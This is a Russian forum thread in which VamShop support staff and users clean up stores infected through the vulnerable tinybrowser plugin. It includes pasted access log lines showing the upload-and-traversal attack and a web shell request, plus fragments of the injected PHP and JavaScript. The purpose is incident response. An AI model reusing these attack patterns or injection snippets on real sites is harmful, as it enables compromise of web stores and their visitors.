По поводу вирусов в магазинах

[support 447]

Информация для тех пользователей, у кого версия VamShop ниже 1.62, а так же для тех пользователей, которые обновляли свои магазины патчами со старых версий.

Пользователей, которые ставили VamShop с нуля, версий 1.62 и выше (текущая верся 1.67), данная проблема не касается.

Так вот, проверьте, если у Вас есть папка /admin/includes/javascript/tiny_mce/plugins/tinybrowser/ - удалите.

Довольно часто в последнее время стали использовать "дырявый" файл-менеджер tinybrowser для заражения сайтов вирусами и прочей гадостью.

Tinybrowser - файл-менеджер, который использовался в старых версия магазина (до 1.62) имеет проблемы с безопасностью, собственно, именно поэтому и был удалён в 1.62 версии и выше.

Если Вы не особо разбираетесь во всех этих тонкостях и Вас уже успели "поломать", советуем обратиться к Вашему хостеру, пусть восстановят резервную копию магазина, без вирусов.

Только перед этим не забудьте сделать текущую копию Вашей базы данных в Админке - Разное - Резервное копирование и сохранить к себе на комп полученный в /admin/backups/ файл. Это для того, что б Вы не потеряли все свои текущие данные, ведь Вам восстановят резервную копию не текущую, а например недельной давности, вот после восстановления возьмёте файл с текущей базой данных и восстановите в Админке - Разное - Резервное копирование.

После восставленовления резервной копии, опять же, удалите tinybrowser папку.

Теперь немного информации о тех файлах, которые обычно "заражают", что б облегчить Вам поиск, если Вы столкнулись с этой проблемой:

1. Довольно часто гадят в файлы в папке: /includes/external/smarty/

Если будете чистить файлы, берите эту папку из архива с магазином и перезаписывайте по-новой, т.е. удаляйте папку и загружайте по-новой.

2. Так же часто бывает гадят в файл внутри папки /jscript

3. В /includes/header.php добавляют подключение левого файла.

Но, главное, оставляют shell скрипт в магазине, бывает конечно, что нагадили и убрали за собой :), в смысле удалили shell, а бывает, что и оставляют shell.

В этом случае конечно чистка от файлов, удаление tinybrowser не поможет.

Найти shell можно по access log файлу веб-сервера, там видно, какой файл куда грузили через tinybrowser.

[-Inna- 0]

да актуальное предупреждение. два старых клиента за последнюю неделю пожаловались что сайт заражен.

вернее что яндекс выводит предупреждение. сами бы до сих пор не знали.

хотя причину конечно точно знать мы не можем. но обновляться нужно

[Maximkin 0]

Саша, спасибо за доступ!

Сегодня тоже весь день убили на очистку нескольких наших сайтов от вирусов.

Конечно, предупредил Яндекс письмом на почту (стоит яндекс Метрика).

Оказались заражены несколько файлов в includes/external/smarty

также появилось несколько новых - на php и js.

Он-лайн сканер http://sitecheck.sucuri.net/scanner/ показал, что инклудится несколько js-скриптов со сторонних сайтов.

после удаления и очистки, вроде все ок стало.

Папку с tinybrowser удалили. Саш, спасибо за совет!

[support 447]

Maximkin

Обычно ещё на сайт грузят shell, через который как раз гадят, вот надо бы убедиться, что shell'a не осталось.

Для этого нужно смотреть access log файл веб-сервера.

Искать там заопрос по tinybrowser и смотреть, какой файл загружали в магазин.

Обычно конечно стирают за собой shell, но бывают и оставляют.

Вот если оставили, нужно удалить его обязательно.

[Maximkin 0]

В логах присутствуют таккие строки:

(адрес сайта заменил на ****)

левые файлы нашли, но про шелл тоже была мысль - поэтому сделали откат из бекапа на несколько дней назад, и удалили папку.

77.247.181.164 - - [19/Mar/2012:06:05:04 +0400] "POST /admin/includes/javascript/tiny_mce/plugins/tinybrowser/upload_file.php?type=file&obfuscate=a74b69ce526bfc13510087e07185ba76&folder= HTTP/1.0" 200 92 "http://127.0.0.1/in.php?id=95" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"




77.247.181.164 - - [19/Mar/2012:06:05:06 +0400] "POST /admin/includes/javascript/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=...../// HTTP/1.0" 200 8783 "http://127.0.0.1/in.php?id=95" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"



77.247.181.164 - - [19/Mar/2012:06:05:07 +0400] "GET /admin/includes/javascript/tiny_mce/themes/advanced/skins/default/dialog.css HTTP/1.0" 200 5590 "http://****.ru/admin/includes/javascript/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=.....///" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"



77.247.181.164 - - [19/Mar/2012:06:05:07 +0400] "GET /admin/includes/javascript/tiny_mce/plugins/tinybrowser/css/style_tinybrowser.css.php HTTP/1.0" 200 4050 "http://*****.ru/admin/includes/javascript/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=.....///" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"



77.247.181.164 - - [19/Mar/2012:06:05:07 +0400] "GET /_thumbs/_blank.gif HTTP/1.0" 404 216 "http://**** .ru/admin/includes/javascript/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=.....///" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"



77.247.181.164 - - [19/Mar/2012:06:05:07 +0400] "GET /_thumbs/_44233.jpg HTTP/1.0" 404 215 "http://**** .ru/admin/includes/javascript/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=.....///" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"



77.247.181.164 - - [19/Mar/2012:06:05:07 +0400] "GET /_thumbs/_4542332.jpg HTTP/1.0" 404 216 "http://**** .ru/admin/includes/javascript/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=.....///" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"



77.247.181.164 - - [19/Mar/2012:06:05:07 +0400] "GET /_thumbs/_565354.jpg HTTP/1.0" 404 216 "http://**** .ru/admin/includes/javascript/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=.....///" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"




77.247.181.164 - - [19/Mar/2012:06:05:07 +0400] "GET /admin/includes/javascript/tiny_mce/themes/advanced/skins/default/img/tabs.gif HTTP/1.0" 200 1326 "http://**** .ru/admin/includes/javascript/tiny_mce/themes/advanced/skins/default/dialog.css" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"



77.247.181.164 - - [19/Mar/2012:06:05:07 +0400] "GET /admin/includes/javascript/tiny_mce/plugins/tinybrowser/img/back.png HTTP/1.0" 200 221 "http://**** .ru/admin/includes/javascript/tiny_mce/plugins/tinybrowser/css/style_tinybrowser.css.php" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"



77.247.181.164 - - [19/Mar/2012:06:05:08 +0400] "GET /admin/includes/javascript/tiny_mce/plugins/tinybrowser/img/preview.gif HTTP/1.0" 200 235 "http://**** .ru/admin/includes/javascript/tiny_mce/plugins/tinybrowser/css/style_tinybrowser.css.php" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"



77.247.181.164 - - [19/Mar/2012:06:05:08 +0400] "GET /admin/includes/javascript/tiny_mce/plugins/tinybrowser/img/asc.gif HTTP/1.0" 200 158 "http://**** .ru/admin/includes/javascript/tiny_mce/plugins/tinybrowser/css/style_tinybrowser.css.php" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"



77.247.181.164 - - [19/Mar/2012:06:05:09 +0400] "GET /m.php HTTP/1.0" 200 930 "-" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"



77.247.181.164 - - [19/Mar/2012:06:05:13 +0400] "POST /admin/includes/javascript/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=...../// HTTP/1.0" 200 8772 "http://127.0.0.1/in.php?id=95" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"



77.247.181.164 - - [19/Mar/2012:06:05:14 +0400] "GET /admin/includes/javascript/tiny_mce/themes/advanced/skins/default/dialog.css HTTP/1.0" 304 0 "http://**** .ru/admin/includes/javascript/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=.....///" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"



77.247.181.164 - - [19/Mar/2012:06:05:14 +0400] "GET /admin/includes/javascript/tiny_mce/plugins/tinybrowser/css/style_tinybrowser.css.php HTTP/1.0" 200 4050 "http://**** .ru/admin/includes/javascript/tiny_mce/plugins/tinybrowser/edit.php?type=image&folder=.....///" "Mozilla/5.0 (Windows NT 6.1; rv:5.0) Gecko/20100101 Firefox/5.0"[/CODE]

[support 447]

Да, это как раз вот и использовали дырку в tinybrowser.

Наверное это не весь кусок.

Но проверьте, есть ли у Вас файл m.php в папке /admin или в корневой папке.

Вот по подобным строкам из access лог файла и видно, какой файл и куда загрузили в магазин.

Это как раз обычно грузят shell, через который уже потом гадят в магазине.

Нужно обязательно удалять tinybrowser папку, если у Вас старая версия VamShop и обязательно проверять, если загрузили Вам shell, то тоже удалять его.

Хотя обычно за собой и shell удаляют

[geval 3]

ну а если папку эту удалить, получается визуальный редактор не будет работать?

что с этим делать?

и не проще ли как-то .htaccess написать для того, чтобы кто попало не имел доступ?

или сделать файл .pwd для всей папки admin ?

а то какие-то уж очень драконовские методы

[Maximkin 0]

Можно по идее защитить всю папку admin htaccess'ом с доступом только с определенных ip. если ip динамические, тогда через htaccess и pwd паролем

хотя шелл могли и не в папке admin оставить ;)

[support 447]

Если речь про старые версии, то будет работать.

Если старая версия, то в редакторе не будет работать файл-менеджер при вставке картинок.

Можно конечно и закрыть всю папку admin паролем.

[support 447]

Maximkin

Если закрыть папку admin паролем через .htpasswd, то доступа просто не будет к tinybrowser и ничего лишнего загрузить не смогут.

[Maximkin 0]

Ну это понятно ;)

[support 447]

Часто гадят в файл /includes/external/smarty/Smarty.class.php и Smarty_Compiler.class.php

Вот пример кода:

if(@$_COOKIE['act']!=1){   

$u4ain=@file_get_contents

...

[/code]

и т.д.

 

Так что если Ваш магазин успели поломать, обязательно проверьте папку /includes/external/smarty/

 

А лучше сразу удалите её, возьмите из архива с VamShop и закачайте к себе в магазин.

[benz_inst 0]

сколько мне вам заплатить ?

[support 447]

Нисколько, у Вас же есть поддержка.

Но нужно подождать проверку яндекса, может ещё где-то осталась кака.

[benz_inst 0]

яндекс 5 минут назад снял заражение, через две минуты оно опять появилось, мы тут в троем всю голову сломали, не знаем что делать.

[Maximkin 0]

Часто гадят в файл /includes/external/smarty/Smarty.class.php и Smarty_Compiler.class.php

Вот пример кода:

if(@$_COOKIE['act']!=1){  

$u4ain=@file_get_contents

...

[/code]

и т.д.

 

Так что если Ваш магазин успели поломать, обязательно проверьте папку /includes/external/smarty/

 

А лучше сразу удалите её, возьмите из архива с VamShop и закачайте к себе в магазин.


 

 

 

Имеено эти два файла у нас на одном сайте оказались заражены уже после удаления tinybrowser. будем искать шел...

[benz_inst 0]

сегодня после регистрации человеку пришло письмо

Уважаемый покупатель!

Вы успешно зарегистрировались в нашем

интернет-магазине, теперь Вам доступны следующие

возможности нашего магазина:

- Корзина покупателя - Все товары, которые Вы добавили в

корзину до регистрации, сохранятся в Вашей корзине.

- Адресная книга - Вы можете делать заказы не только на

свой домашний адрес, но и на любой другой. Например, Вы

можете сделать подарок знакомым.

- История заказов - Вы можете следить за процессом

исполнения Вашего заказа.

- Отзывы - Оставляйте свои отзывы о товарах, заказанных

в нашем магазине.

Если у Вас возникли вопросы, свяжитесь с нами по

адресу: support@optsar.ru

Предупреждение: Данный E-Mail адрес был получен нами от

клиента. Если Вы нигде не указывали данный E-Mail адрес,

свяжитесь с нами: support@optsar.ru

function set_cookie(name, value,expires){

if (!expires){

expires = new Date();

}

document.cookie = name + "=" + escape(value) + "; expires=" + expires.toGMTString() + "; path=/";

}

var name = "act";

var tmp = "1";

expires = new Date();

expires.setTime(expires.getTime() + (1000 * 86400 * 1));

set_cookie(name,tmp,expires);

здесь может быть вирус ?

[Maximkin 0]

Мы проверяли наши сайта он лайн сканером http://sitecheck.sucuri.net/scanner/

Покажет где внедрены левый JS-код (который как поняли как раз через Smarty.class.php и добавляется). Севетую, вобщем.

яндекс 5 минут назад снял заражение, через две минуты оно опять появилось, мы тут в троем всю голову сломали, не знаем что делать.

Насколько знаю, яндекс в течение нескольких дней пересканирует сайт и от метка о заражении уберается, но не так же быстро.

[benz_inst 0]

вчера утром яндекс просканировал и написал то что вирусы еще остались, в обед он пишет то что все ок!, хотя мы больше ни чего не удаляли т.к не знали что удалять, через сутки опять все плохо. т.е яндекс при своем желании сканирует быстрее.

[Александр Муравьев 0]

самое действенное это конечно взять 1.67 и поставить с нуля

эта мысль пришла в голову через сутки дум и возни с вирусами. еще сутки на установку и отладку - в итоге 2 дня работы (установка, отладка, подгонка своих модулей и шаблона) и сайт чист и актуален. чего и вам желаю.

[support 447]

benz_inst

Вот этот код, что Вы привели где-то в коде сидит, его надо искать и удалять.

Шаблоны писем в /templates/шаблон/mail/russian/

Письмо о регистрации отправляется из /create_account.php

Не смотретли там?

[support 447]

А интересно, в яндексе как-то можно получить более точную инофрмацию, что именно ему не нравится в коде.

Выводит только список url адресов и всё.

Если б хотя бы пример кода был, который ему не нравится.

Никто не интересовался?

[Maximkin 0]

в яндекс webmaster такой функции нет, он лишь отображает список зараженных страниц, да и то не всех. скорее всего нельзя.

Кстати, еще примечательный момент: когда удаляли вирусы заметили одну необчную особенность. В html коде страницы появлялся инклуд JS скрипта со стороннего сайта, Но его наличие было не постоянным. Открываегт html код - он есть, через полчаса - уже нет. Через некоторое время появлялся снова.

Может яндекс на это и реагирует.

[vitalik 0]

Спасибо за тему, вовремя я ее увидел и удалил папку tinybrowser. А случайно нет ли у поддержки какой-нибудь почтовой рассылки? Например, чтобы не форум мониторить, а письмо получить, если вдруг что-то обнаружится подобное, чтобы можно было быстренько закрыть дырку. А то времени жутко много уходит. Собственно, одна такая возможность уже достойна оплаты продления поддержки каждый раз, когда она заканчивается ;)

[benz_inst 0]

benz_inst

Вот этот код, что Вы привели где-то в коде сидит, его надо искать и удалять.

Шаблоны писем в /templates/шаблон/mail/russian/

Письмо о регистрации отправляется из /create_account.php

Не смотретли там?

нет не смотрел, сейчас яндекс одобрил мой сайт после замены папки /includes/external/smarty/

но сейчас посматрю может что увижу